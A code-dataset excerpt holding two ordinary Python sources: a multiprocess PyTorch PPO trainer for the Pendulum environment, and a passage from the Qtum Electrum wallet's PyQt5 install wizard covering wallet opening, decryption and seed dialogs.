source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
ppo_continuous_multiprocess.py | '''
Multi-processing for PPO continuous version 1
'''
import math
import random
import gym
import numpy as np
import torch
torch.multiprocessing.set_start_method('forkserver', force=True) # critical for make multiprocessing work
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.distributions import Normal, MultivariateNormal
from IPython.display import clear_output
import matplotlib.pyplot as plt
from matplotlib import animation
from IPython.display import display
from reacher import Reacher
import argparse
import time
import torch.multiprocessing as mp
from torch.multiprocessing import Process
from multiprocessing import Process, Manager
from multiprocessing.managers import BaseManager
import threading as td
# ---- device selection -------------------------------------------------------
GPU = True          # set False to force CPU even when CUDA is available
device_idx = 0      # CUDA device index used when GPU is True
if GPU:
    device = torch.device("cuda:" + str(device_idx) if torch.cuda.is_available() else "cpu")
else:
    device = torch.device("cpu")
print(device)

# ---- command-line flags -----------------------------------------------------
parser = argparse.ArgumentParser(description='Train or test neural net motor controller.')
parser.add_argument('--train', dest='train', action='store_true', default=False)
parser.add_argument('--test', dest='test', action='store_true', default=False)
args = parser.parse_args()

#####################  hyper parameters  ####################
ENV_NAME = 'Pendulum-v0'    # environment name
RANDOMSEED = 2              # random seed
EP_MAX = 1000               # total number of episodes for training
EP_LEN = 200                # total number of steps for each episode
GAMMA = 0.9                 # reward discount
A_LR = 0.0001               # learning rate for actor
C_LR = 0.0002               # learning rate for critic
BATCH = 128                 # update batchsize
A_UPDATE_STEPS = 10         # actor update steps per PPO update
C_UPDATE_STEPS = 10         # critic update steps per PPO update
EPS = 1e-8                  # numerical residual (avoids division by zero in the ratio)
MODEL_PATH = 'model/ppo_multi'
NUM_WORKERS = 2             # or: mp.cpu_count()
ACTION_RANGE = 1.           # if unnormalized, normalized action range should be 1.
METHOD = [
    dict(name='kl_pen', kl_target=0.01, lam=0.5),   # KL penalty
    dict(name='clip', epsilon=0.2),                 # Clipped surrogate objective, find this is better
][0]                        # choose the method for optimization
############################### PPO ####################################
class AddBias(nn.Module):
    """Learnable additive bias broadcast over a batch.

    Used to implement a state-independent log-std: applying the module to a
    zero tensor yields just the (learned) bias.
    """

    def __init__(self, bias):
        super(AddBias, self).__init__()
        # Stored as (num_features, 1) so it can be reshaped for 2-D or 4-D inputs.
        self._bias = nn.Parameter(bias.unsqueeze(1))

    def forward(self, x):
        # Broadcast over the batch dim; for 4-D input also over spatial dims.
        target_shape = (1, -1) if x.dim() == 2 else (1, -1, 1, 1)
        return x + self._bias.t().view(*target_shape)
class ValueNetwork(nn.Module):
    """State-value estimator V(s): one hidden ReLU layer + a scalar head."""

    def __init__(self, state_dim, hidden_dim, init_w=3e-3):
        super(ValueNetwork, self).__init__()
        self.linear1 = nn.Linear(state_dim, hidden_dim)
        self.linear4 = nn.Linear(hidden_dim, 1)
        # Small uniform init on the head keeps initial value estimates near zero.
        self.linear4.weight.data.uniform_(-init_w, init_w)
        self.linear4.bias.data.uniform_(-init_w, init_w)

    def forward(self, state):
        hidden = F.relu(self.linear1(state))
        return self.linear4(hidden)
class PolicyNetwork(nn.Module):
    """Gaussian policy network.

    The mean comes from a two-layer MLP squashed by tanh into
    [-action_range, action_range]; the log-std is state-independent, realized
    as a learnable bias applied to a zero tensor (AddBias), following
    ikostrikov's pytorch-a2c-ppo-acktr implementation.
    """

    def __init__(self, num_inputs, num_actions, hidden_dim, action_range=1., init_w=3e-3, log_std_min=-20, log_std_max=2):
        super(PolicyNetwork, self).__init__()
        # Kept for interface compatibility with the clamped-log-std variant.
        self.log_std_min = log_std_min
        self.log_std_max = log_std_max
        self.linear1 = nn.Linear(num_inputs, hidden_dim)
        self.linear2 = nn.Linear(hidden_dim, hidden_dim)
        self.mean_linear = nn.Linear(hidden_dim, num_actions)
        # State-independent log-std (implementation 2 in the original notes).
        self.log_std = AddBias(torch.zeros(num_actions))
        self.num_actions = num_actions
        self.action_range = action_range

    def forward(self, state):
        """Return (mean, log_std); both have shape (batch, num_actions)."""
        x = F.relu(self.linear1(state))
        x = F.relu(self.linear2(x))
        # torch.tanh: F.tanh has been deprecated since PyTorch 1.2.
        mean = self.action_range * torch.tanh(self.mean_linear(x))
        zeros = torch.zeros(mean.size())
        if state.is_cuda:
            zeros = zeros.cuda()
        log_std = self.log_std(zeros)
        return mean, log_std

    def get_action(self, state, deterministic=False):
        """Produce a single action for an unbatched state, clipped to range.

        Fix: `deterministic` was previously accepted but ignored; it now
        returns the distribution mean when True instead of sampling.
        """
        state = torch.FloatTensor(state).unsqueeze(0).to(device)
        mean, log_std = self.forward(state)
        if deterministic:
            action = mean
        else:
            std = log_std.exp()
            normal = Normal(mean, std)
            action = normal.sample()
        action = torch.clamp(action, -self.action_range, self.action_range)
        return action.squeeze(0)

    def sample_action(self,):
        """Uniform random action in [-1, 1]^num_actions (e.g. for warm-up)."""
        a = torch.FloatTensor(self.num_actions).uniform_(-1, 1)
        return a.numpy()
class NormalizedActions(gym.ActionWrapper):
    """Maps agent actions in [-1, 1] onto the env's [low, high] box and back."""

    def _action(self, action):
        low, high = self.action_space.low, self.action_space.high
        # Affine map [-1, 1] -> [low, high], then clip to the box.
        scaled = low + (action + 1.0) * 0.5 * (high - low)
        return np.clip(scaled, low, high)

    def _reverse_action(self, action):
        low, high = self.action_space.low, self.action_space.high
        # Inverse affine map; clipped against [low, high] as in the original.
        unscaled = 2 * (action - low) / (high - low) - 1
        return np.clip(unscaled, low, high)
class PPO(object):
    '''
    PPO agent: actor/old-actor pair for the importance-sampling ratio, plus a
    critic, with either KL-penalty or clipped-surrogate updates (see METHOD).
    '''
    def __init__(self, state_dim, action_dim, hidden_dim=512, a_lr=3e-4, c_lr=3e-4):
        # `actor` is trained; `actor_old` is a frozen snapshot taken at the
        # start of each update() and used only to compute the ratio.
        self.actor = PolicyNetwork(state_dim, action_dim, hidden_dim, ACTION_RANGE).to(device)
        self.actor_old = PolicyNetwork(state_dim, action_dim, hidden_dim, ACTION_RANGE).to(device)
        self.critic = ValueNetwork(state_dim, hidden_dim).to(device)
        self.actor_optimizer = optim.Adam(self.actor.parameters(), lr=a_lr)
        self.critic_optimizer = optim.Adam(self.critic.parameters(), lr=c_lr)
        print(self.actor, self.critic)

    def a_train(self, s, a, adv):
        '''
        Update policy network (one gradient step).
        :param s: state batch
        :param a: action batch
        :param adv: advantage batch
        :return: mean KL divergence when METHOD is 'kl_pen', else None
        '''
        mu, log_std = self.actor(s)
        pi = Normal(mu, torch.exp(log_std))
        mu_old, log_std_old = self.actor_old(s)
        oldpi = Normal(mu_old, torch.exp(log_std_old))
        # ratio = torch.exp(pi.log_prob(a) - oldpi.log_prob(a)) # sometimes give nan
        # EPS guards against division by zero when the old probability is ~0.
        ratio = torch.exp(pi.log_prob(a)) / (torch.exp(oldpi.log_prob(a)) + EPS)
        surr = ratio * adv
        if METHOD['name'] == 'kl_pen':
            lam = METHOD['lam']
            kl = torch.distributions.kl.kl_divergence(oldpi, pi)
            kl_mean = kl.mean()
            aloss = -((surr - lam * kl).mean())
        else:  # clipping method, find this is better
            aloss = -torch.mean(torch.min(surr, torch.clamp(ratio, 1. - METHOD['epsilon'], 1. + METHOD['epsilon']) * adv))
        self.actor_optimizer.zero_grad()
        aloss.backward()
        self.actor_optimizer.step()
        if METHOD['name'] == 'kl_pen':
            return kl_mean

    def update_old_pi(self):
        '''
        Copy current actor weights into actor_old (snapshot the old policy).
        :return: None
        '''
        for p, oldp in zip(self.actor.parameters(), self.actor_old.parameters()):
            oldp.data.copy_(p)

    def c_train(self, cumulative_r, s):
        '''
        Update critic (value) network by regressing V(s) onto the return.
        :param cumulative_r: cumulative (discounted) reward, i.e. the target
        :param s: state
        :return: None
        '''
        v = self.critic(s)
        advantage = cumulative_r - v
        closs = (advantage**2).mean()
        self.critic_optimizer.zero_grad()
        closs.backward()
        self.critic_optimizer.step()

    def cal_adv(self, s, cumulative_r):
        '''
        Calculate advantage = return - V(s), detached from the critic's graph.
        :param s: state
        :param cumulative_r: cumulative reward
        :return: advantage (no grad)
        '''
        advantage = cumulative_r - self.critic(s)
        return advantage.detach()

    def update(self, s, a, r):
        '''
        One full PPO update on a collected batch: snapshot the old policy,
        compute advantages, then run several actor and critic steps.
        :param s: state batch (numpy)
        :param a: action batch (numpy)
        :param r: discounted-return batch (numpy)
        :return: None
        '''
        s = torch.FloatTensor(s).to(device)
        a = torch.FloatTensor(a).to(device)
        r = torch.FloatTensor(r).to(device)

        self.update_old_pi()
        adv = self.cal_adv(s, r)
        # adv = (adv - adv.mean())/(adv.std()+1e-6)  # sometimes helpful

        # update actor
        if METHOD['name'] == 'kl_pen':
            for _ in range(A_UPDATE_STEPS):
                kl = self.a_train(s, a, adv)
                if kl > 4 * METHOD['kl_target']:  # this in in google's paper
                    break
            # Adapt the KL penalty coefficient (OpenAI's adaptive-lambda rule).
            if kl < METHOD['kl_target'] / 1.5:  # adaptive lambda, this is in OpenAI's paper
                METHOD['lam'] /= 2
            elif kl > METHOD['kl_target'] * 1.5:
                METHOD['lam'] *= 2
            METHOD['lam'] = np.clip(
                METHOD['lam'], 1e-4, 10
            )  # sometimes explode, this clipping is MorvanZhou's solution
        else:  # clipping method, find this is better (OpenAI's paper)
            for _ in range(A_UPDATE_STEPS):
                self.a_train(s, a, adv)

        # update critic
        for _ in range(C_UPDATE_STEPS):
            self.c_train(r, s)

    def choose_action(self, s):
        '''
        Choose action by sampling from the current policy.
        :param s: state
        :return: clipped action as a numpy array
        '''
        a = self.actor.get_action(s)
        return a.detach().cpu().numpy()

    def get_v(self, s):
        '''
        Compute value estimate V(s).
        :param s: state (numpy); promoted to a batch of one if unbatched
        :return: value as a numpy array
        '''
        s = s.astype(np.float32)
        if s.ndim < 2: s = s[np.newaxis, :]  # add batch dim for a single state
        s = torch.FloatTensor(s).to(device)
        return self.critic(s).squeeze(0).detach().cpu().numpy()

    def save_model(self, path):
        # Saves three separate state-dict files: <path>_actor / _critic / _actor_old.
        torch.save(self.actor.state_dict(), path+'_actor')
        torch.save(self.critic.state_dict(), path+'_critic')
        torch.save(self.actor_old.state_dict(), path+'_actor_old')

    def load_model(self, path):
        # Restores the three state-dict files and switches to eval mode.
        self.actor.load_state_dict(torch.load(path+'_actor'))
        self.critic.load_state_dict(torch.load(path+'_critic'))
        self.actor_old.load_state_dict(torch.load(path+'_actor_old'))
        self.actor.eval()
        self.critic.eval()
        self.actor_old.eval()
def ShareParameters(adamoptim):
    """Move an Adam optimizer's state tensors into shared memory.

    Adam creates its per-parameter state lazily on the first step; we create
    it eagerly here so it exists before fork and can be shared (Hogwild-style)
    across worker processes.
    """
    for group in adamoptim.param_groups:
        for param in group['params']:
            state = adamoptim.state[param]
            # initialize: have to initialize here, or else cannot find
            state['step'] = 0
            state['exp_avg'] = torch.zeros_like(param.data)
            state['exp_avg_sq'] = torch.zeros_like(param.data)
            # share in memory
            state['exp_avg'].share_memory_()
            state['exp_avg_sq'].share_memory_()
def plot(rewards):
    """Save the running-reward curve to 'ppo_multi.png' (no interactive show)."""
    clear_output(True)  # clears previous output when running in a notebook
    plt.figure(figsize=(10,5))
    plt.plot(rewards)
    plt.savefig('ppo_multi.png')
    # plt.show()
    plt.clf()  # free the figure so repeated calls don't accumulate memory
def worker(id, ppo, rewards_queue):
    """Training loop run in each child process.

    Each worker owns its own environment instance but updates the *shared*
    PPO networks/optimizer state (shared via share_memory in main()).

    :param id: worker index (currently unused inside the loop)
    :param ppo: shared PPO agent
    :param rewards_queue: multiprocessing queue for reporting episode rewards
    """
    env = gym.make(ENV_NAME).unwrapped
    state_dim = env.observation_space.shape[0]   # NOTE(review): unused here
    action_dim = env.action_space.shape[0]       # NOTE(review): unused here
    all_ep_r = []
    for ep in range(EP_MAX):
        s = env.reset()
        buffer={
            'state':[],
            'action':[],
            'reward':[]
        }
        ep_r = 0
        t0 = time.time()
        for t in range(EP_LEN):  # in one episode
            # env.render()
            a = ppo.choose_action(s)
            s_, r, done, _ = env.step(a)
            buffer['state'].append(s)
            buffer['action'].append(a)
            # buffer['reward'].append(r)
            buffer['reward'].append((r + 8) / 8)  # normalize reward, find to be useful sometimes; from my experience, it works with 'penalty' version, while 'clip' verison works without this normalization
            s = s_
            ep_r += r
            # update ppo every BATCH steps, at episode end, or on termination
            if (t + 1) % BATCH == 0 or t == EP_LEN - 1 or done:
                if done:
                    v_s_=0  # terminal state has zero bootstrap value
                else:
                    v_s_ = ppo.get_v(s_)[0]
                # Compute discounted returns backwards from the bootstrap value.
                discounted_r = []
                for r in buffer['reward'][::-1]:
                    v_s_ = r + GAMMA * v_s_
                    discounted_r.append(v_s_)
                discounted_r.reverse()
                bs, ba, br = np.vstack(buffer['state']), np.vstack(buffer['action']), np.array(discounted_r)[:, np.newaxis]
                buffer['state'], buffer['action'], buffer['reward'] = [], [], []
                ppo.update(bs, ba, br)
                if done:
                    break
        # Exponential moving average of the episode reward (for logging only).
        if ep == 0:
            all_ep_r.append(ep_r)
        else:
            all_ep_r.append(all_ep_r[-1] * 0.9 + ep_r * 0.1)
        if ep%50==0:
            ppo.save_model(MODEL_PATH)  # periodic checkpoint
        print(
            'Episode: {}/{} | Episode Reward: {:.4f} | Running Time: {:.4f}'.format(
                ep, EP_MAX, ep_r,
                time.time() - t0
            )
        )
        rewards_queue.put(ep_r)  # report raw episode reward to the parent
    ppo.save_model(MODEL_PATH)
    env.close()
def main():
    """Entry point: --train spawns worker processes sharing one PPO agent;
    --test loads the saved model and runs it with rendering."""
    # reproducible
    # env.seed(RANDOMSEED)
    np.random.seed(RANDOMSEED)
    torch.manual_seed(RANDOMSEED)

    env = NormalizedActions(gym.make(ENV_NAME).unwrapped)
    state_dim = env.observation_space.shape[0]
    action_dim = env.action_space.shape[0]
    ppo = PPO(state_dim, action_dim, hidden_dim=128)

    if args.train:
        # Put network parameters and optimizer state in shared memory so all
        # worker processes update the same agent (Hogwild-style).
        ppo.actor.share_memory()
        ppo.actor_old.share_memory()
        ppo.critic.share_memory()
        ShareParameters(ppo.actor_optimizer)
        ShareParameters(ppo.critic_optimizer)

        rewards_queue=mp.Queue()  # used for get rewards from all processes and plot the curve
        processes=[]
        rewards=[]

        for i in range(NUM_WORKERS):
            process = Process(target=worker, args=(i, ppo, rewards_queue))  # the args contain shared and not shared
            process.daemon=True  # all processes closed when the main stops
            processes.append(process)
        [p.start() for p in processes]

        # NOTE(review): workers never put None on the queue, so this loop only
        # ends when the process is interrupted -- confirm intended behavior.
        while True:  # keep geting the episode reward from the queue
            r = rewards_queue.get()
            if r is not None:
                # Smooth the reported reward with an exponential moving average.
                if len(rewards) == 0:
                    rewards.append(r)
                else:
                    rewards.append(rewards[-1] * 0.9 + r * 0.1)
            else:
                break
            if len(rewards)%20==0 and len(rewards)>0:
                plot(rewards)

        [p.join() for p in processes]  # finished at the same time
        ppo.save_model(MODEL_PATH)

    if args.test:
        ppo.load_model(MODEL_PATH)
        while True:
            s = env.reset()
            for i in range(EP_LEN):
                env.render()
                s, r, done, _ = env.step(ppo.choose_action(s))
                if done:
                    break

if __name__ == '__main__':
    main()
|
installwizard.py |
import sys
import threading
import os
import traceback
from PyQt5.QtCore import *
from qtum_electrum import Wallet, WalletStorage
from qtum_electrum.util import UserCancelled, InvalidPassword
from qtum_electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET
from qtum_electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
class GoBack(Exception):
    """Raised by wizard dialogs when the user presses the Back button."""
    pass
# Prompt shown when asking the user to pick a wallet password
# (leaving the field empty disables encryption).
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
                     + _("Leave this field empty if you want to disable encryption.")
# Explanation shown when offering wallet-file encryption for hardware wallets.
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n' \
                            + _("Your wallet file does not contain secrets, mostly just metadata. ") \
                            + _("It also contains your master public key that allows watching your addresses.") + '\n\n' \
                            + _(
    "Note: If you enable this setting, you will need your hardware device to open your wallet.")
class CosignWidget(QWidget):
    """Pie-chart widget visualising an m-of-n multisig setup:
    m green slices out of n total."""
    size = 120

    def __init__(self, m, n):
        QWidget.__init__(self)
        self.R = QRect(0, 0, self.size, self.size)
        self.setGeometry(self.R)
        self.setMinimumHeight(self.size)
        self.setMaximumHeight(self.size)
        self.m = m
        self.n = n

    def set_n(self, n):
        self.n = n
        self.update()

    def set_m(self, m):
        self.m = m
        self.update()

    def paintEvent(self, event):
        background = self.palette().color(QPalette.Background)
        painter = QPainter()
        painter.begin(self)
        painter.setPen(QPen(background, 7, Qt.SolidLine))
        painter.setRenderHint(QPainter.Antialiasing)
        painter.setBrush(Qt.gray)
        # Qt pie angles are expressed in 1/16ths of a degree.
        for i in range(self.n):
            start = int(16 * 360 * i / self.n)
            span = int(16 * 360 * 1 / self.n)
            painter.setBrush(Qt.green if i < self.m else Qt.gray)
            painter.drawPie(self.R, start, span)
        painter.end()
def wizard_dialog(func):
    """Decorator for wizard pages.

    Sets the Back/Cancel button label, runs the page, swallows user
    cancellation, maps GoBack onto navigation, and finally feeds the page's
    result into the `run_next` continuation supplied via kwargs.
    """
    def func_wrapper(*args, **kwargs):
        run_next = kwargs['run_next']
        wizard = args[0]
        wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
        try:
            out = func(*args, **kwargs)
        except GoBack:
            if wizard.can_go_back():
                wizard.go_back()
            else:
                wizard.close()
            return
        except UserCancelled:
            return
        # run_next expects positional args; wrap a bare value in a tuple.
        # (Deliberately `type(...) is not tuple`: tuple subclasses such as
        # NamedTuples are still wrapped, exactly as before.)
        if type(out) is not tuple:
            out = (out,)
        run_next(*out)
    return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
    """Qt install wizard guiding the user through opening/creating a wallet."""

    accept_signal = pyqtSignal()
    synchronized_signal = pyqtSignal(str)

    def __init__(self, config, app, plugins, storage):
        BaseWizard.__init__(self, config, storage)
        QDialog.__init__(self, None)
        self.setWindowTitle('Qtum Electrum - ' + _('Install Wizard'))
        self.app = app
        self.config = config
        # Set for base base class
        self.plugins = plugins
        self.language_for_seed = config.get('language')
        self.setMinimumSize(600, 400)
        self.accept_signal.connect(self.accept)
        self.title = QLabel()
        self.main_widget = QWidget()
        self.back_button = QPushButton(_("Back"), self)
        self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
        self.next_button = QPushButton(_("Next"), self)
        self.next_button.setDefault(True)
        self.logo = QLabel()
        self.please_wait = QLabel(_("Please wait..."))
        self.please_wait.setAlignment(Qt.AlignCenter)
        self.icon_filename = None
        self.loop = QEventLoop()
        # Event-loop exit codes used throughout: 0 = cancel, 1 = back, 2 = next.
        self.rejected.connect(lambda: self.loop.exit(0))
        self.back_button.clicked.connect(lambda: self.loop.exit(1))
        self.next_button.clicked.connect(lambda: self.loop.exit(2))
        outer_vbox = QVBoxLayout(self)
        inner_vbox = QVBoxLayout()
        inner_vbox.addWidget(self.title)
        inner_vbox.addWidget(self.main_widget)
        inner_vbox.addStretch(1)
        inner_vbox.addWidget(self.please_wait)
        inner_vbox.addStretch(1)
        scroll_widget = QWidget()
        scroll_widget.setLayout(inner_vbox)
        scroll = QScrollArea()
        scroll.setWidget(scroll_widget)
        scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
        scroll.setWidgetResizable(True)
        icon_vbox = QVBoxLayout()
        icon_vbox.addWidget(self.logo)
        icon_vbox.addStretch(1)
        hbox = QHBoxLayout()
        hbox.addLayout(icon_vbox)
        hbox.addSpacing(5)
        hbox.addWidget(scroll)
        hbox.setStretchFactor(scroll, 1)
        outer_vbox.addLayout(hbox)
        outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
        self.set_icon(':icons/electrum.png')
        self.show()
        self.raise_()
        self.refresh_gui()  # Need for QT on MacOSX. Lame.

    def run_and_get_wallet(self):
        """Show the wallet-file chooser, handle decryption/split/upgrade, and
        return the opened Wallet (or None if the user cancels)."""
        vbox = QVBoxLayout()
        hbox = QHBoxLayout()
        hbox.addWidget(QLabel(_('Wallet') + ':'))
        self.name_e = QLineEdit()
        hbox.addWidget(self.name_e)
        button = QPushButton(_('Choose...'))
        hbox.addWidget(button)
        vbox.addLayout(hbox)

        self.msg_label = QLabel('')
        vbox.addWidget(self.msg_label)
        hbox2 = QHBoxLayout()
        self.pw_e = QLineEdit('', self)
        self.pw_e.setFixedWidth(150)
        self.pw_e.setEchoMode(2)  # password echo mode
        self.pw_label = QLabel(_('Password') + ':')
        hbox2.addWidget(self.pw_label)
        hbox2.addWidget(self.pw_e)
        hbox2.addStretch()
        vbox.addLayout(hbox2)
        self.set_layout(vbox, title=_('Electrum wallet'))

        wallet_folder = os.path.dirname(self.storage.path)

        def on_choose():
            path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
            if path:
                self.name_e.setText(path)

        def on_filename(filename):
            # Re-point self.storage at the typed path and refresh the UI hints
            # (message text, password field visibility, Next availability).
            path = os.path.join(wallet_folder, filename)
            try:
                self.storage = WalletStorage(path)
                self.next_button.setEnabled(True)
            except IOError:
                self.storage = None
                self.next_button.setEnabled(False)
            if self.storage:
                if not self.storage.file_exists():
                    msg = _("This file does not exist.") + '\n' \
                          + _("Press 'Next' to create this wallet, or choose another file.")
                    pw = False
                else:
                    if self.storage.is_encrypted_with_user_pw():
                        msg = _("This file is encrypted with a password.") + '\n' \
                              + _('Enter your password or choose another file.')
                        pw = True
                    elif self.storage.is_encrypted_with_hw_device():
                        msg = _("This file is encrypted using a hardware device.") + '\n' \
                              + _("Press 'Next' to choose device to decrypt.")
                        pw = False
                    else:
                        msg = _("Press 'Next' to open this wallet.")
                        pw = False
            else:
                msg = _('Cannot read file')
                pw = False
            self.msg_label.setText(msg)
            if pw:
                self.pw_label.show()
                self.pw_e.show()
                self.pw_e.setFocus()
            else:
                self.pw_label.hide()
                self.pw_e.hide()

        button.clicked.connect(on_choose)
        self.name_e.textChanged.connect(on_filename)
        n = os.path.basename(self.storage.path)
        self.name_e.setText(n)

        # Loop until the user selects a readable (and, if needed, decrypted)
        # wallet file, or cancels.
        while True:
            if self.storage.file_exists() and not self.storage.is_encrypted():
                break
            if self.loop.exec_() != 2:  # 2 = next
                return
            if not self.storage.file_exists():
                break
            if self.storage.file_exists() and self.storage.is_encrypted():
                if self.storage.is_encrypted_with_user_pw():
                    password = self.pw_e.text()
                    try:
                        self.storage.decrypt(password)
                        break
                    except InvalidPassword as e:
                        QMessageBox.information(None, _('Error'), str(e))
                        continue
                    except BaseException as e:
                        traceback.print_exc(file=sys.stdout)
                        QMessageBox.information(None, _('Error'), str(e))
                        return
                elif self.storage.is_encrypted_with_hw_device():
                    try:
                        self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET)
                    except InvalidPassword as e:
                        # FIXME if we get here because of mistyped passphrase
                        # then that passphrase gets "cached"
                        QMessageBox.information(
                            None, _('Error'),
                            _('Failed to decrypt using this hardware device.') + '\n' +
                            _('If you use a passphrase, make sure it is correct.'))
                        self.stack = []
                        return self.run_and_get_wallet()
                    except BaseException as e:
                        traceback.print_exc(file=sys.stdout)
                        QMessageBox.information(None, _('Error'), str(e))
                        return
                    if self.storage.is_past_initial_decryption():
                        break
                    else:
                        return
                else:
                    raise Exception('Unexpected encryption version')

        path = self.storage.path
        if self.storage.requires_split():
            # Legacy multi-account wallet: offer to split it into files.
            self.hide()
            msg = _("The wallet '%s' contains multiple accounts, which are no longer supported in Electrum 2.7.\n\n"
                    "Do you want to split your wallet into multiple files?"%path)
            if not self.question(msg):
                return
            file_list = '\n'.join(self.storage.split_accounts())
            msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
            if self.question(msg):
                os.remove(path)
                self.show_warning(_('The file was removed'))
            return

        if self.storage.requires_upgrade():
            # Old storage format: upgrade in place (irreversible).
            self.hide()
            msg = _("The format of your wallet '%s' must be upgraded for Electrum. This change will not be backward compatible"%path)
            if not self.question(msg):
                return
            self.storage.upgrade()
            self.show_warning(_('Your wallet was upgraded successfully'))
            self.wallet = Wallet(self.storage)
            return self.wallet

        action = self.storage.get_action()
        if action and action != 'new':
            # Incompletely-created wallet: offer to finish (or delete) it.
            self.hide()
            msg = _("The file '%s' contains an incompletely created wallet.\n"
                    "Do you want to complete its creation now?") % path
            if not self.question(msg):
                if self.question(_("Do you want to delete '%s'?") % path):
                    os.remove(path)
                    self.show_warning(_('The file was removed'))
                return
            self.show()
        if action:
            # self.wallet is set in run
            self.run(action)
            return self.wallet

        self.wallet = Wallet(self.storage)
        return self.wallet

    def finished(self):
        """Called in hardware client wrapper, in order to close popups."""
        return

    def on_error(self, exc_info):
        # Show unexpected errors to the user; user cancellation is silent.
        if not isinstance(exc_info[1], UserCancelled):
            traceback.print_exception(*exc_info)
            self.show_error(str(exc_info[1]))

    def set_icon(self, filename):
        """Swap the wizard's logo pixmap; returns the previous filename."""
        prior_filename, self.icon_filename = self.icon_filename, filename
        self.logo.setPixmap(QPixmap(filename).scaledToWidth(60))
        return prior_filename

    def set_layout(self, layout, title=None, next_enabled=True):
        """Install `layout` as the wizard page content, replacing the old one."""
        self.title.setText("<b>%s</b>"%title if title else "")
        self.title.setVisible(bool(title))
        # Get rid of any prior layout by assigning it to a temporary widget
        prior_layout = self.main_widget.layout()
        if prior_layout:
            QWidget().setLayout(prior_layout)
        self.main_widget.setLayout(layout)
        self.back_button.setEnabled(True)
        self.next_button.setEnabled(next_enabled)
        if next_enabled:
            self.next_button.setFocus()
        self.main_widget.setVisible(True)
        self.please_wait.setVisible(False)

    def exec_layout(self, layout, title=None, raise_on_cancel=True,
                    next_enabled=True):
        """Show a page and block until the user navigates.

        Raises UserCancelled on cancel (unless raise_on_cancel is False) and
        GoBack on Back; otherwise returns the loop's exit code and switches
        the UI into the 'please wait' state.
        """
        self.set_layout(layout, title, next_enabled)
        result = self.loop.exec_()
        if not result and raise_on_cancel:
            raise UserCancelled
        if result == 1:
            raise GoBack
        self.title.setVisible(False)
        self.back_button.setEnabled(False)
        self.next_button.setEnabled(False)
        self.main_widget.setVisible(False)
        self.please_wait.setVisible(True)
        self.refresh_gui()
        return result

    def refresh_gui(self):
        # For some reason, to refresh the GUI this needs to be called twice
        self.app.processEvents()
        self.app.processEvents()

    def remove_from_recently_open(self, filename):
        self.config.remove_from_recently_open(filename)

    def text_input(self, title, message, is_valid):
        """Page with a validated free-text key input; returns the text."""
        slayout = KeysLayout(parent=self, title=message, is_valid=is_valid)
        self.exec_layout(slayout, title, next_enabled=False)
        return slayout.get_text()

    def seed_input(self, title, message, is_seed, options):
        """Page with a seed-phrase input; returns (seed, is_bip39, is_ext)."""
        slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
        self.exec_layout(slayout, title, next_enabled=False)
        return slayout.get_seed(), slayout.is_bip39, slayout.is_ext

    @wizard_dialog
    def add_xpub_dialog(self, title, message, is_valid, run_next):
        return self.text_input(title, message, is_valid)

    @wizard_dialog
    def add_cosigner_dialog(self, run_next, index, is_valid):
        title = _("Add Cosigner") + " %d"%index
        message = ' '.join([
            _('Please enter the master public key (xpub) of your cosigner.'),
            _('Enter their master private key (xprv) if you want to be able to sign for them.')
        ])
        return self.text_input(title, message, is_valid)

    @wizard_dialog
    def restore_seed_dialog(self, run_next, test):
        options = []
        # if self.opt_ext:
        #     options.append('ext')
        # if self.opt_bip39:
        #     options.append('bip39')
        title = _('Enter Seed')
        if 'mobile' == self.wallet_type:
            message = ''.join([
                _('Please enter your seed phrase in order to restore your wallet. \n'),
                _('This is compatible with qtum mobile wallet. \n')])
        else:
            message = ''.join([
                _('Please enter your seed phrase in order to restore your wallet. \n'),
                _('Qtum Electrum is not compatiable with qtum mobile wallet seed words yet. \n'),
                _('You cannot restore your mobile wallet in Qtum Electrum for now.')])
        return self.seed_input(title, message, test, options)

    @wizard_dialog
    def confirm_seed_dialog(self, run_next, test):
        # Clear the clipboard so the user cannot simply paste the seed back.
        self.app.clipboard().clear()
        title = _('Confirm Seed')
        message = ' '.join([
            _('Your seed is important!'),
            _('If you lose your seed, your money will be permanently lost.'),
            _('To make sure that you have properly saved your seed, please retype it here.')
        ])
        seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
        return seed

    @wizard_dialog
    def show_seed_dialog(self, run_next, seed_text):
        title = _("Your wallet generation seed is:")
        slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
        self.exec_layout(slayout)
        return slayout.is_ext

    def pw_layout(self, msg, kind, force_disable_encrypt_cb):
        """Password page; returns (new_password, encrypt_wallet_checkbox)."""
        playout = PasswordLayout(None, msg, kind, self.next_button,
                                 force_disable_encrypt_cb=force_disable_encrypt_cb)
        playout.encrypt_cb.setChecked(True)
        self.exec_layout(playout.layout())
        return playout.new_password(), playout.encrypt_cb.isChecked()

    @wizard_dialog
    def request_password(self, run_next, force_disable_encrypt_cb=False):
        """Request the user enter a new password and confirm it. Return
        the password or None for no password."""
        return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)

    @wizard_dialog
    def request_storage_encryption(self, run_next):
        playout = PasswordLayoutForHW(None, MSG_HW_STORAGE_ENCRYPTION, PW_NEW, self.next_button)
        playout.encrypt_cb.setChecked(True)
        self.exec_layout(playout.layout())
        return playout.encrypt_cb.isChecked()

    def show_restore(self, wallet, network):
        # FIXME: these messages are shown after the install wizard is
        # finished and the window closed.  On MacOSX they appear parented
        # with a re-appeared ghost install wizard window...
        if network:
